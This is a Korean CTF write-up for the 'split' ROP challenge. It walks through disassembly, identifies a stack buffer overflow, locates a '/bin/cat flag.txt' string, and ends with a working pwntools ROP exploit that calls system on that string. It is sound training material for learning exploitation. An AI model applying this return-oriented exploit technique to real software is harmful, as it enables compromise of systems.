split

728x90

1. intro

2. code 및 분석

2.1. code

pwnme

   0x00000000004006e8 <+0>:     push   %rbp
   0x00000000004006e9 <+1>:     mov    %rsp,%rbp
   0x00000000004006ec <+4>:     sub    $0x20,%rsp
   0x00000000004006f0 <+8>:     lea    -0x20(%rbp),%rax
   0x00000000004006f4 <+12>:    mov    $0x20,%edx
   0x00000000004006f9 <+17>:    mov    $0x0,%esi
   0x00000000004006fe <+22>:    mov    %rax,%rdi
   0x0000000000400701 <+25>:    call   0x400580 <memset@plt>
   0x0000000000400706 <+30>:    mov    $0x400810,%edi
   0x000000000040070b <+35>:    call   0x400550 <puts@plt>
   0x0000000000400710 <+40>:    mov    $0x40083c,%edi
   0x0000000000400715 <+45>:    mov    $0x0,%eax
   0x000000000040071a <+50>:    call   0x400570 <printf@plt>
   0x000000000040071f <+55>:    lea    -0x20(%rbp),%rax
   0x0000000000400723 <+59>:    mov    $0x60,%edx
   0x0000000000400728 <+64>:    mov    %rax,%rsi
   0x000000000040072b <+67>:    mov    $0x0,%edi
   0x0000000000400730 <+72>:    call   0x400590 <read@plt>
   0x0000000000400735 <+77>:    mov    $0x40083f,%edi
   0x000000000040073a <+82>:    call   0x400550 <puts@plt>
   0x000000000040073f <+87>:    nop
   0x0000000000400740 <+88>:    leave
   0x0000000000400741 <+89>:    ret

usefulFunction

   0x0000000000400742 <+0>:     push   %rbp
   0x0000000000400743 <+1>:     mov    %rsp,%rbp
   0x0000000000400746 <+4>:     mov    $0x40084a,%edi
   0x000000000040074b <+9>:     call   0x400560 <system@plt>
   0x0000000000400750 <+14>:    nop
   0x0000000000400751 <+15>:    pop    %rbp
   0x0000000000400752 <+16>:    ret

2.2. 분석

앞선 문제와 거의 같다.

다만 system 함수를 call 할때의 인자인 0x40084a에 들어있는 문자열은 /bin/ls 이다.

3. 취약점 확인 및 공격 준비

3.1. 취약점

buffer overflow

3.2. 공격 준비

위에서 이야기한 것과 같이 system call 시 인자가 /bin/ls이다.

gef➤  x/s 0x40084a
0x40084a:       "/bin/ls"

하지만 플래그를 읽기위한 문자열이 바이너리 내에 있다.

gef➤  grep "/bin/cat flag.txt"
[+] Searching '/bin/cat flag.txt' in memory
[+] In '/home/wyv3rn/rop/split'(0x601000-0x602000), permission=rw-
  0x601060 - 0x601071  →   "/bin/cat flag.txt"

그러므로 이를 인자로 system 함수를 바로 call 하면 되겠다.

4. exploit

from pwn import *

p = process('./split')

pay = b'A'*0x28
pay += p64(0x00000000004007c3) #pop rdi, ret
pay += p64(0x601060)
pay += p64(0x000000000040074b)

p.sendlineafter(b'> ',pay)

p.interactive()